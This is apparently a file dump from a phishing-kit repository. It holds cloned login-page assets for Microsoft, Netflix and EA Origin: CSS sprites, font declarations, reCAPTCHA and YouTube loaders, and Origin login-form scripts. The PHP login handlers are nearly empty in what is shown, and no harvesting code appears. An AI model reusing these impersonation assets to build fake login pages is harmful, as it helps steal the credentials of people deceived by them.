/.sites/microsoft/ellipsis_white.svg: -------------------------------------------------------------------------------- 1 | assets -------------------------------------------------------------------------------- /.sites/microsoft/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/microsoft/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/microsoft/microsoft_logo.svg: -------------------------------------------------------------------------------- 1 | assets -------------------------------------------------------------------------------- /.sites/microsoft/prefetch.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Prefetch 5 | 6 | 7 | 8 | 14 | 15 | 16 | 20 | 21 | 22 | 23 | 24 | A -------------------------------------------------------------------------------- /.sites/microsoft/sprite1.css: -------------------------------------------------------------------------------- 1 | .image-adchoices_icon-png{background:url('adchoices_icon.png');width:12px;height:12px}.image-olk_logo_white_cropped-png{background:url('olk_logo_white_cropped.png');width:265px;height:310px}.image-owa_brand-png{background:url('owa_brand.png');width:160px;height:30px}.image-readingpane_recipientwell_callout-png{background:url('readingpane_recipientwell_callout.png');width:370px;height:245px}.image-loading_blackbg-gif{background:url('loading_blackbg.gif');width:16px;height:16px}.image-loading_whitebg-gif{background:url('loading_whitebg.gif');width:16px;height:16px}.image-thinking16_blue-gif{background:url('thinking16_blue.gif');width:16px;height:16px}.image-thinking16_grey-gif{background:url('thinking16_grey.gif');width:16px;height:16px}.image-thinking16_white-gif{background:url('thinking16_white.gif');width:16px;height:16px}.image-thinking24-gif{background:url('thinking24.gif');width:24px;height:24px}.image-thinking32_blue-gif{background:url('thinking32_blue.gif');width:32px;height:32px}.image-thinking32_grey-gif{background:url('thinking32_grey.gif');width:32px;height:32px}.image-thinking32_white-gif{background:url('thinking32_white.gif');width:32px;height:32px}.image-r_jpg-png{width:75px;height:75px;background:url('sprite1.mouse.png') -0 -0}.image-clutter_delete_all-png{width:32px;height:32px;background:url('sprite1.mouse.png') -77px -0}.image-clutter_delete_all_p-png{width:32px;height:32px;background:url('sprite1.mouse.png') -111px -0}.image-listview_buscheck_single-png{width:16px;height:32px;background:url('sprite1.mouse.png') -145px -0}.image-listview_buscheck_top-png{width:16px;height:32px;background:url('sprite1.mouse.png') -163px -0}.image-listview_busstop_bottom-png{width:16px;height:32px;background:url('sprite1.mouse.png') -181px -0}.image-listview_busstop_empty-png{width:16px;height:32px;background:url('sprite1.mouse.png') -199px -0}.image-listview_busstop_middle-png{width:16px;height:32px;background:url('sprite1.mouse.png') -217px -0}.image-office_logo_white_small-png{width:81px;height:26px;background:url('sprite1.mouse.png') -235px -0}.image-dc-gdoc-png{width:20px;height:20px;background:url('sprite1.mouse.png') -318px -0}.image-dc-gsheet-png{width:20px;height:20px;background:url('sprite1.mouse.png') -340px -0}.image-dc-gslide-png{width:20px;height:20px;background:url('sprite1.mouse.png') -362px -0}.image-fberror4-png{width:18px;height:18px;background:url('sprite1.mouse.png') -384px -0}.image-googerror2-png{width:18px;height:18px;background:url('sprite1.mouse.png') -404px -0}.image-lierror2-png{width:18px;height:18px;background:url('sprite1.mouse.png') -424px -0}.image-sinweerror2-png{width:18px;height:18px;background:url('sprite1.mouse.png') -444px -0}.image-twitrerror2-png{width:18px;height:18px;background:url('sprite1.mouse.png') -464px -0}.image-yhooerror2-png{width:18px;height:18px;background:url('sprite1.mouse.png') -484px -0}.image-abchactive1-png{width:16px;height:16px;background:url('sprite1.mouse.png') -504px -0}.image-chevrons_down-png{width:16px;height:16px;background:url('sprite1.mouse.png') -522px -0}.image-close_p-png{width:16px;height:16px;background:url('sprite1.mouse.png') -540px -0}.image-dc-accdb-png{width:16px;height:16px;background:url('sprite1.mouse.png') -558px -0}.image-dc-aspx-png{width:16px;height:16px;background:url('sprite1.mouse.png') -576px -0}.image-dc-bmp-png{width:16px;height:16px;background:url('sprite1.mouse.png') -318px -22px}.image-dc-docx-png{width:16px;height:16px;background:url('sprite1.mouse.png') -336px -22px}.image-dc-exe-png{width:16px;height:16px;background:url('sprite1.mouse.png') -354px -22px}.image-dc-generic-png{width:16px;height:16px;background:url('sprite1.mouse.png') -372px -22px}.image-dc-gif-png{width:16px;height:16px;background:url('sprite1.mouse.png') -390px -22px}.image-dc-jpg-png{width:16px;height:16px;background:url('sprite1.mouse.png') -408px -22px}.image-dc-lync-png{width:16px;height:16px;background:url('sprite1.mouse.png') -426px -22px}.image-dc-mpg-png{width:16px;height:16px;background:url('sprite1.mouse.png') -444px -22px}.image-dc-msg-png{width:16px;height:16px;background:url('sprite1.mouse.png') -462px -22px}.image-dc-msg_attachment-png{width:16px;height:16px;background:url('sprite1.mouse.png') -480px -22px}.image-dc-one-png{width:16px;height:16px;background:url('sprite1.mouse.png') -498px -22px}.image-dc-pblsh-png{width:16px;height:16px;background:url('sprite1.mouse.png') -516px -22px}.image-dc-pdf-png{width:16px;height:16px;background:url('sprite1.mouse.png') -534px -22px}.image-dc-png-png{width:16px;height:16px;background:url('sprite1.mouse.png') -552px -22px}.image-dc-pptx-png{width:16px;height:16px;background:url('sprite1.mouse.png') -570px -22px}.image-dc-rpmsg-png{width:16px;height:16px;background:url('sprite1.mouse.png') -318px -40px}.image-dc-txt-png{width:16px;height:16px;background:url('sprite1.mouse.png') -336px -40px}.image-dc-vsd-png{width:16px;height:16px;background:url('sprite1.mouse.png') -354px -40px}.image-dc-wv-png{width:16px;height:16px;background:url('sprite1.mouse.png') -372px -40px}.image-dc-xlsx-png{width:16px;height:16px;background:url('sprite1.mouse.png') -390px -40px}.image-dc-zip-png{width:16px;height:16px;background:url('sprite1.mouse.png') -408px -40px}.image-event_accepted-png{width:16px;height:16px;background:url('sprite1.mouse.png') -426px -40px}.image-event_declined-png{width:16px;height:16px;background:url('sprite1.mouse.png') -444px -40px}.image-event_tentative-png{width:16px;height:16px;background:url('sprite1.mouse.png') -462px -40px}.image-fbactive4-png{width:16px;height:16px;background:url('sprite1.mouse.png') -480px -40px}.image-googactive2-png{width:16px;height:16px;background:url('sprite1.mouse.png') -498px -40px}.image-liactive-png{width:16px;height:16px;background:url('sprite1.mouse.png') -516px -40px}.image-mark_not_clutter-png{width:16px;height:16px;background:url('sprite1.mouse.png') -534px -40px}.image-mark_not_clutter_h-png{width:16px;height:16px;background:url('sprite1.mouse.png') -552px -40px}.image-response_approve-png{width:16px;height:16px;background:url('sprite1.mouse.png') -570px -40px}.image-response_reject-png{width:16px;height:16px;background:url('sprite1.mouse.png') -318px -58px}.image-response_request-png{width:16px;height:16px;background:url('sprite1.mouse.png') -336px -58px}.image-sinweactive-png{width:16px;height:16px;background:url('sprite1.mouse.png') -354px -58px}.image-skypeactive2-png{width:16px;height:16px;background:url('sprite1.mouse.png') -372px -58px}.image-task_red-png{width:16px;height:16px;background:url('sprite1.mouse.png') -390px -58px}.image-task_red_h-png{width:16px;height:16px;background:url('sprite1.mouse.png') -408px -58px}.image-twitractive2-png{width:16px;height:16px;background:url('sprite1.mouse.png') -426px -58px}.image-voicemail_irm-png{width:16px;height:16px;background:url('sprite1.mouse.png') -444px -58px}.image-yhooactive2-png{width:16px;height:16px;background:url('sprite1.mouse.png') -462px -58px}.image-task_reoccurring-png{width:15px;height:16px;background:url('sprite1.mouse.png') -480px -58px}.image-task-png{width:14px;height:16px;background:url('sprite1.mouse.png') -497px -58px}.image-triangle_down_small-png{width:12px;height:12px;background:url('sprite1.mouse.png') -513px -58px}.image-navigation_close-png{width:11px;height:11px;background:url('sprite1.mouse.png') -527px -58px}.image-clear1x1-gif{width:1px;height:1px;background:url('sprite1.mouse.png') -540px -58px}.csimg{padding:0;border:none;background-repeat:no-repeat;-webkit-touch-callout:none}span.csimg{-ms-high-contrast-adjust:none} -------------------------------------------------------------------------------- /.sites/microsoft/sprite1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/microsoft/sprite1.png -------------------------------------------------------------------------------- /.sites/netflix/FB-f-Logo__blue_57.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/netflix/FB-f-Logo__blue_57.png -------------------------------------------------------------------------------- /.sites/netflix/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/netflix/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/origin/EA_Origin_Lockup_Black.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/origin/EA_Origin_Lockup_Black.png -------------------------------------------------------------------------------- /.sites/origin/api.js: -------------------------------------------------------------------------------- 1 | /* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function() {var CFG='___grecaptcha_cfg';if(!window[CFG]){window[CFG]={};}var GR='grecaptcha';if(!window[GR]){window[GR]={};}window[GR].ready=window[GR].ready||function(f){(window[CFG]['fns']=window[CFG]['fns']||[]).push(f);};(window[CFG]['render']=window[CFG]['render']||[]).push('onload');window['__google_recaptcha_client']=true;var po=document.createElement('script');po.type='text/javascript';po.async=true;po.src='https://www.gstatic.com/recaptcha/api2/v1528855115741/recaptcha__en.js';var elem=document.querySelector('script[nonce]');var n=elem&&(elem['nonce']||elem.getAttribute('nonce'));if(n){po.setAttribute('nonce',n);}var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(po, s);})(); -------------------------------------------------------------------------------- /.sites/origin/css.css: -------------------------------------------------------------------------------- 1 | /* cyrillic-ext */ 2 | @font-face { 3 | font-family: 'Open Sans'; 4 | font-style: normal; 5 | font-weight: 300; 6 | src: local('Open Sans Light'), local('OpenSans-Light'), url(https://fonts.gstatic.com/s/opensans/v15/mem5YaGs126MiZpBA-UN_r8OX-hpOqc.woff2) format('woff2'); 7 | unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F; 8 | } 9 | /* cyrillic */ 10 | @font-face { 11 | font-family: 'Open Sans'; 12 | font-style: normal; 13 | font-weight: 300; 14 | src: local('Open Sans Light'), local('OpenSans-Light'), url(https://fonts.gstatic.com/s/opensans/v15/mem5YaGs126MiZpBA-UN_r8OVuhpOqc.woff2) format('woff2'); 15 | unicode-range: U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116; 16 | } 17 | /* greek-ext */ 18 | @font-face { 19 | font-family: 'Open Sans'; 20 | font-style: normal; 21 | font-weight: 300; 22 | src: local('Open Sans Light'), local('OpenSans-Light'), url(https://fonts.gstatic.com/s/opensans/v15/mem5YaGs126MiZpBA-UN_r8OXuhpOqc.woff2) format('woff2'); 23 | unicode-range: U+1F00-1FFF; 24 | } 25 | /* greek */ 26 | @font-face { 27 | font-family: 'Open Sans'; 28 | font-style: normal; 29 | font-weight: 300; 30 | src: local('Open Sans Light'), local('OpenSans-Light'), url(https://fonts.gstatic.com/s/opensans/v15/mem5YaGs126MiZpBA-UN_r8OUehpOqc.woff2) format('woff2'); 31 | unicode-range: U+0370-03FF; 32 | } 33 | /* vietnamese */ 34 | @font-face { 35 | font-family: 'Open Sans'; 36 | font-style: normal; 37 | font-weight: 300; 38 | src: local('Open Sans Light'), local('OpenSans-Light'), url(https://fonts.gstatic.com/s/opensans/v15/mem5YaGs126MiZpBA-UN_r8OXehpOqc.woff2) format('woff2'); 39 | unicode-range: U+0102-0103, U+0110-0111, U+1EA0-1EF9, U+20AB; 40 | } 41 | /* latin-ext */ 42 | @font-face { 43 | font-family: 'Open Sans'; 44 | font-style: normal; 45 | font-weight: 300; 46 | src: local('Open Sans Light'), local('OpenSans-Light'), url(https://fonts.gstatic.com/s/opensans/v15/mem5YaGs126MiZpBA-UN_r8OXOhpOqc.woff2) format('woff2'); 47 | unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF; 48 | } 49 | /* latin */ 50 | @font-face { 51 | font-family: 'Open Sans'; 52 | font-style: normal; 53 | font-weight: 300; 54 | src: local('Open Sans Light'), local('OpenSans-Light'), url(https://fonts.gstatic.com/s/opensans/v15/mem5YaGs126MiZpBA-UN_r8OUuhp.woff2) format('woff2'); 55 | unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD; 56 | } 57 | /* cyrillic-ext */ 58 | @font-face { 59 | font-family: 'Open Sans'; 60 | font-style: normal; 61 | font-weight: 400; 62 | src: local('Open Sans Regular'), local('OpenSans-Regular'), url(https://fonts.gstatic.com/s/opensans/v15/mem8YaGs126MiZpBA-UFWJ0bbck.woff2) format('woff2'); 63 | unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F; 64 | } 65 | /* cyrillic */ 66 | @font-face { 67 | font-family: 'Open Sans'; 68 | font-style: normal; 69 | font-weight: 400; 70 | src: local('Open Sans Regular'), local('OpenSans-Regular'), url(https://fonts.gstatic.com/s/opensans/v15/mem8YaGs126MiZpBA-UFUZ0bbck.woff2) format('woff2'); 71 | unicode-range: U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116; 72 | } 73 | /* greek-ext */ 74 | @font-face { 75 | font-family: 'Open Sans'; 76 | font-style: normal; 77 | font-weight: 400; 78 | src: local('Open Sans Regular'), local('OpenSans-Regular'), url(https://fonts.gstatic.com/s/opensans/v15/mem8YaGs126MiZpBA-UFWZ0bbck.woff2) format('woff2'); 79 | unicode-range: U+1F00-1FFF; 80 | } 81 | /* greek */ 82 | @font-face { 83 | font-family: 'Open Sans'; 84 | font-style: normal; 85 | font-weight: 400; 86 | src: local('Open Sans Regular'), local('OpenSans-Regular'), url(https://fonts.gstatic.com/s/opensans/v15/mem8YaGs126MiZpBA-UFVp0bbck.woff2) format('woff2'); 87 | unicode-range: U+0370-03FF; 88 | } 89 | /* vietnamese */ 90 | @font-face { 91 | font-family: 'Open Sans'; 92 | font-style: normal; 93 | font-weight: 400; 94 | src: local('Open Sans Regular'), local('OpenSans-Regular'), url(https://fonts.gstatic.com/s/opensans/v15/mem8YaGs126MiZpBA-UFWp0bbck.woff2) format('woff2'); 95 | unicode-range: U+0102-0103, U+0110-0111, U+1EA0-1EF9, U+20AB; 96 | } 97 | /* latin-ext */ 98 | @font-face { 99 | font-family: 'Open Sans'; 100 | font-style: normal; 101 | font-weight: 400; 102 | src: local('Open Sans Regular'), local('OpenSans-Regular'), url(https://fonts.gstatic.com/s/opensans/v15/mem8YaGs126MiZpBA-UFW50bbck.woff2) format('woff2'); 103 | unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF; 104 | } 105 | /* latin */ 106 | @font-face { 107 | font-family: 'Open Sans'; 108 | font-style: normal; 109 | font-weight: 400; 110 | src: local('Open Sans Regular'), local('OpenSans-Regular'), url(https://fonts.gstatic.com/s/opensans/v15/mem8YaGs126MiZpBA-UFVZ0b.woff2) format('woff2'); 111 | unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD; 112 | } 113 | /* cyrillic-ext */ 114 | @font-face { 115 | font-family: 'Open Sans'; 116 | font-style: normal; 117 | font-weight: 600; 118 | src: local('Open Sans SemiBold'), local('OpenSans-SemiBold'), url(https://fonts.gstatic.com/s/opensans/v15/mem5YaGs126MiZpBA-UNirkOX-hpOqc.woff2) format('woff2'); 119 | unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F; 120 | } 121 | /* cyrillic */ 122 | @font-face { 123 | font-family: 'Open Sans'; 124 | font-style: normal; 125 | font-weight: 600; 126 | src: local('Open Sans SemiBold'), local('OpenSans-SemiBold'), url(https://fonts.gstatic.com/s/opensans/v15/mem5YaGs126MiZpBA-UNirkOVuhpOqc.woff2) format('woff2'); 127 | unicode-range: U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116; 128 | } 129 | /* greek-ext */ 130 | @font-face { 131 | font-family: 'Open Sans'; 132 | font-style: normal; 133 | font-weight: 600; 134 | src: local('Open Sans SemiBold'), local('OpenSans-SemiBold'), url(https://fonts.gstatic.com/s/opensans/v15/mem5YaGs126MiZpBA-UNirkOXuhpOqc.woff2) format('woff2'); 135 | unicode-range: U+1F00-1FFF; 136 | } 137 | /* greek */ 138 | @font-face { 139 | font-family: 'Open Sans'; 140 | font-style: normal; 141 | font-weight: 600; 142 | src: local('Open Sans SemiBold'), local('OpenSans-SemiBold'), url(https://fonts.gstatic.com/s/opensans/v15/mem5YaGs126MiZpBA-UNirkOUehpOqc.woff2) format('woff2'); 143 | unicode-range: U+0370-03FF; 144 | } 145 | /* vietnamese */ 146 | @font-face { 147 | font-family: 'Open Sans'; 148 | font-style: normal; 149 | font-weight: 600; 150 | src: local('Open Sans SemiBold'), local('OpenSans-SemiBold'), url(https://fonts.gstatic.com/s/opensans/v15/mem5YaGs126MiZpBA-UNirkOXehpOqc.woff2) format('woff2'); 151 | unicode-range: U+0102-0103, U+0110-0111, U+1EA0-1EF9, U+20AB; 152 | } 153 | /* latin-ext */ 154 | @font-face { 155 | font-family: 'Open Sans'; 156 | font-style: normal; 157 | font-weight: 600; 158 | src: local('Open Sans SemiBold'), local('OpenSans-SemiBold'), url(https://fonts.gstatic.com/s/opensans/v15/mem5YaGs126MiZpBA-UNirkOXOhpOqc.woff2) format('woff2'); 159 | unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF; 160 | } 161 | /* latin */ 162 | @font-face { 163 | font-family: 'Open Sans'; 164 | font-style: normal; 165 | font-weight: 600; 166 | src: local('Open Sans SemiBold'), local('OpenSans-SemiBold'), url(https://fonts.gstatic.com/s/opensans/v15/mem5YaGs126MiZpBA-UNirkOUuhp.woff2) format('woff2'); 167 | unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD; 168 | } 169 | -------------------------------------------------------------------------------- /.sites/origin/iframe_api.js: -------------------------------------------------------------------------------- 1 | 2 | if (!window['YT']) {var YT = {loading: 0,loaded: 0};}if (!window['YTConfig']) {var YTConfig = {'host': 'http://www.youtube.com'};}if (!YT.loading) {YT.loading = 1;(function(){var l = [];YT.ready = function(f) {if (YT.loaded) {f();} else {l.push(f);}};window.onYTReady = function() {YT.loaded = 1;for (var i = 0; i < l.length; i++) {try {l[i]();} catch (e) {}}};YT.setConfig = function(c) {for (var k in c) {if (c.hasOwnProperty(k)) {YTConfig[k] = c[k];}}};var a = document.createElement('script');a.type = 'text/javascript';a.id = 'www-widgetapi-script';a.src = 'https://s.ytimg.com/yts/jsbin/www-widgetapi-vfl3m9ZW-/www-widgetapi.js';a.async = true;var c = document.currentScript;if (c) {var n = c.nonce || c.getAttribute('nonce');if (n) {a.setAttribute('nonce', n);}}var b = document.getElementsByTagName('script')[0];b.parentNode.insertBefore(a, b);})();} -------------------------------------------------------------------------------- /.sites/origin/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/origin/jquery_002.js: -------------------------------------------------------------------------------- 1 | (function(a,b){a.fn.originLayout=function(e,g){var f={};var d={init:function(){a("form").bind("submit.originLayout",d.events.originFormSubmit);a(".panel-action-area .btn-next").bind("click.originLayout",d.events.originNextButtonClick)},events:{originFormSubmit:function(h){a(".panel-action-area .origin-ux-button",this).addClass("disabled").unbind("click").bind("click",function(i){i.preventDefault()})},originNextButtonClick:function(h){if(a(this).hasClass("disabled")){h.stopImmediatePropagation()}else{a(this).parent(".panel-action-area").find(".origin-ux-button").addClass("disabled")}return false}},helpers:{}};var c=["init"];if(typeof e==="object"||!e){d.init()}else{if(a.inArray(e,c)){}}}})(jQuery);$(document).ready(function(){$.fn.originLayout()}); -------------------------------------------------------------------------------- /.sites/origin/jquery_004.js: -------------------------------------------------------------------------------- 1 | (function(a,b){var c=function(){var e=function(h){var g=String.fromCharCode(h.which);if(g.toUpperCase()===g&&g.toLowerCase()!==g&&!h.shiftKey){a("#password").siblings(".otkicon-capslock").addClass("otkinput-capslock-visible")}else{a("#password").siblings(".otkicon-capslock").removeClass("otkinput-capslock-visible")}};var d=function(){if(a(".otkinput-capslock:visible").length>0){a("#password").siblings(".otkicon-capslock").removeClass("otkinput-capslock-visible")}};a("#password").on("keypress",e);a("#password").on("focusout",d);a(".otkcheckbox input, .otkradio input, .otkselect select").focusin(function(g){g.preventDefault();a(this).parent("span").addClass("focus")}).focusout(function(g){g.preventDefault();a(this).parent("span").removeClass("focus")});var f=function(g){if(!g){return}g.each(function(){var n=2;var r=parseFloat(a(this).css("padding-top"))+n;var j=parseFloat(a(this).css("padding-right"))+n;var i=parseFloat(a(this).css("padding-bottom"))+n;var k=parseFloat(a(this).css("padding-left"))+n;var q=r+"px "+j+"px "+i+"px "+k+"px";a(this).css("padding",q);var h=parseFloat(a(this).css("margin-top"))-n;var p=parseFloat(a(this).css("margin-right"))-n;var m=parseFloat(a(this).css("margin-bottom"))-n;var l=parseFloat(a(this).css("margin-left"))-n;var o=h+"px "+p+"px "+m+"px "+l+"px";a(this).css("margin",o);a(this).css("outline-offset","-2px");a(this).hover(function(){a(this).blur()},function(){a(this).blur()});a(this).click(function(){a(this).blur()});a(this).focus(function(){a(this).addClass("outline-focus")});a(this).blur(function(){a(this).removeClass("outline-focus")})})};f(a("a.forgot-password-link"));f(a("a.registration-link"));f(a("div#panel-privacy-settings > p > a"));a(a("div#panel-privacy-settings > p > a")).css("outline-offset","0px");f(a("label#label-readAccept > a"));f(a("#uploader.container-inner > .file-select-note > span > a"));f(a("#panel-profile-upgrade > .panel-contents > .panel-content > p > a"));f(a("#panel-nux > .panel-contents > .panel-content > p > a"))};a(document).ready(function(){c()})})(jQuery);"use strict";var QWebChannelMessageTypes={signal:1,propertyUpdate:2,init:3,idle:4,debug:5,invokeMethod:6,connectToSignal:7,disconnectFromSignal:8,setProperty:9,response:10,};var QWebChannel=function(c,a){if(typeof c!=="object"||typeof c.send!=="function"){console.error("The QWebChannel expects a transport object with a send function and onmessage callback property. Given is: transport: "+typeof(c)+", transport.send: "+typeof(c.send));return}var b=this;this.transport=c;this.send=function(d){if(typeof(d)!=="string"){d=JSON.stringify(d)}b.transport.send(d)};this.transport.onmessage=function(d){var e=d.data;if(typeof e==="string"){e=JSON.parse(e)}switch(e.type){case QWebChannelMessageTypes.signal:b.handleSignal(e);break;case QWebChannelMessageTypes.response:b.handleResponse(e);break;case QWebChannelMessageTypes.propertyUpdate:b.handlePropertyUpdate(e);break;default:console.error("invalid message received:",d.data);break}};this.execCallbacks={};this.execId=0;this.exec=function(d,e){if(!e){b.send(d);return}if(b.execId===Number.MAX_VALUE){b.execId=Number.MIN_VALUE}if(d.hasOwnProperty("id")){console.error("Cannot exec message with property id: "+JSON.stringify(d));return}d.id=b.execId++;b.execCallbacks[d.id]=e;b.send(d)};this.objects={};this.handleSignal=function(e){var d=b.objects[e.object];if(d){d.signalEmitted(e.signal,e.args)}else{console.warn("Unhandled signal: "+e.object+"::"+e.signal)}};this.handleResponse=function(d){if(!d.hasOwnProperty("id")){console.error("Invalid response message received: ",JSON.stringify(d));return}b.execCallbacks[d.id](d.data);delete b.execCallbacks[d.id]};this.handlePropertyUpdate=function(f){for(var e in f.data){var g=f.data[e];var d=b.objects[g.object];if(d){d.propertyUpdate(g.signals,g.properties)}else{console.warn("Unhandled property update: "+g.object+"::"+g.signal)}}b.exec({type:QWebChannelMessageTypes.idle})};this.debug=function(d){b.send({type:QWebChannelMessageTypes.debug,data:d})};b.exec({type:QWebChannelMessageTypes.init},function(e){for(var f in e){var d=new QObject(f,e[f],b)}for(var f in b.objects){b.objects[f].unwrapProperties()}if(a){a(b)}b.exec({type:QWebChannelMessageTypes.idle})})};function QObject(d,g,e){this.__id__=d;e.objects[d]=this;this.__objectSignals__={};this.__propertyCache__={};var c=this;this.unwrapQObject=function(l){if(l instanceof Array){var m=new Array(l.length);for(var n=0;n -------------------------------------------------------------------------------- /.sites/origin/originX-pc-common.css: -------------------------------------------------------------------------------- 1 | .form-container{display:block;position:static;clear:both;width:480px;margin:auto;top:calc(50% - 324px);left:calc(50% - 240px);-webkit-animation:none;-moz-animation:none;-o-animation:none;animation:none}.views{border-radius:0 0 4px 4px;color:#141b20;background-color:#fff}nav.otknavbar{height:58px}a{text-decoration:none}a:hover{text-decoration:underline}a.otkbtn{text-decoration:none!important}body{font-family:'Open Sans',sans-serif;text-rendering:optimizeLegibility;-webkit-font-smoothing:antialiased;height:100%;min-height:100%;margin:0;overflow:hidden}.otknav.otknav-pills{border-bottom:1px solid #c3c6ce;height:58px;overflow:hidden;padding-left:40px}.otknav.otknav-pills li.otkpill-active:after{content:"";height:3px;width:100%;position:absolute;bottom:0;background:#f56c2d}section{height:calc(708px - 98px);padding:24px 40px;overflow:auto}section .otkbtn{margin:24px 0 6px 0}section h1{margin:12px 0 24px 0!important}.general-error{background:#d80000 url(../../../ui/core/img/background-general-error.png) right -49px;height:49px;overflow:hidden;display:none;width:100%;margin:0;padding:0}.otklabel{width:100%;display:block;margin:24px 0 12px 0}.otkform-group-help{display:none}p.otkform-group-help{margin:6px auto 12px auto}.otkform-group-haserror.otkform-group-help{display:block}.otkform{margin-bottom:24px}.otkcheckbox>label{vertical-align:middle;line-height:24px;white-space:normal}.otkcheckbox>input,.otkradio>input{display:block;opacity:0;position:absolute}.otkcheckbox.focus>label:before,.otkradio.focus>label:before,.otkselect.focus>.otkselect-label{border:1px solid #f56c2d}.otkbtn-primary.disabled{cursor:default;opacity:.45;pointer-events:none}select.disabled{pointer-events:none}.otknotice-stripe-message .otkicon{left:0}.otkform-group-field.otkicon{top:0;display:block}.otkicon-checkcircle,.otkicon-challenge{left:-18px;color:#04bd68;-webkit-animation:popIn .5s ease-in-out;-moz-animation:popIn .5s ease-in-out;-o-animation:popIn .5s ease-in-out;animation:popIn .5s ease-in-out}.otkicon-warning{left:-18px;color:#fea722;-webkit-animation:popIn .5s ease-in-out;-moz-animation:popIn .5s ease-in-out;-o-animation:popIn .5s ease-in-out;animation:popIn .5s ease-in-out}.otkicon-warning:before,.otkicon-checkcircle:before,.otkicon-challenge:before{display:block;font-size:96px}.right{float:right}.otkbtn:hover{background:#c85e36}footer{height:40px;margin:0;padding:0;top:0;border-radius:0 0 4px 4px;color:#787d85;background-color:#edf1f2;display:block;clear:both;position:relative;overflow:hidden}footer img{height:20px;margin:10px 12px 10px 24px}img{vertical-align:middle}.upgrade-privacy-friend{margin-bottom:12px;display:inline-block}.otkinput-capslock{display:none;position:absolute;top:50%;left:330px;-webkit-transform:translate(0,-50%);-ms-transform:translate(0,-50%);transform:translate(0,-50%);z-index:2;color:#c3c6ce;font-size:32px}.otkicon-capslock-position{left:295px}.otkinput-capslock-visible{display:block}*,*:before,*:after{-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing:border-box}*{padding:0;margin:0;-webkit-backface-visibility:hidden} -------------------------------------------------------------------------------- /.sites/origin/originX-pc-login.css: -------------------------------------------------------------------------------- 1 | .otktooltip-bottom .otktooltip-arrow{top:2px}.otktooltip{margin:0;padding:0}.otktooltip-effect .otktooltip-bottom{position:relative;top:-5px;left:-44%;height:0}.otktooltip .otktooltip-inner{position:relative;top:7px;padding:10px 12px;text-align:left}#logViews section p{margin-bottom:24px}#loginBase .otkbtn{margin-top:6px;width:100%;max-width:100%}#loginBase .otkbtn-primary{margin-top:0}#passwordShow{position:absolute;top:0;right:14px;padding:6px;width:inherit!important;z-index:1}#passwordShow.otkbtn-light{color:#141b20;border:1px solid #c3c6ce;background:#edf1f2}#passwordShow.otkbtn-light:hover{background:#c3c6ce}.otktooltip-withcontent{display:inline-table;position:relative}#logViews .otkicon-help{font-size:24px;color:#c3c6ce;position:static;height:16px;display:-webkit-inline-box;top:0}.clearfix:after,.tile-touch .otkscrim:after{content:"";display:table;clear:both}.captcha-container{list-style:outside none none}.recaptcha-form-default{padding:24px;border-radius:4px;background-color:#edf1f2;text-align:center;margin-bottom:24px}.recaptcha-form-default a{outline:0;text-decoration:none;position:relative;width:0;font-size:18px;color:#787d85;cursor:pointer;-webkit-transition:color .3s ease-in-out;-moz-transition:color .3s ease-in-out;-ms-transition:color .3s ease-in-out;-o-transition:color .3s ease-in-out;transition:color .3s ease-in-out}.otkfield-input{height:45px;padding:0 10px}.otkfield{position:relative;display:block;width:100%;margin:0;font-size:16px;font-weight:400;font-family:inherit;background:#fff;outline:0;border:1px solid #c3c6ce;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;border-radius:4px;-moz-appearance:none;-webkit-appearance:none;appearance:none;-webkit-transition:all .3s ease-in-out;transition:all .3s ease-in-out}.otkicon-refresh{margin:5px}.recaptcha-form-default input{width:200px;margin:auto}.recaptcha-form-default img{margin-top:18px;margin-bottom:18px;border-radius:4px;margin-left:30px}.recaptcha-form-default input:focus{border:1px solid #f56c2d!important;background:#fff;z-index:1;-webkit-box-shadow:0 0 1px 0 #f56c2d;box-shadow:0 0 1px 0 #f56c2d}#captcha-container2{margin-bottom:25px}#prepopulate-email 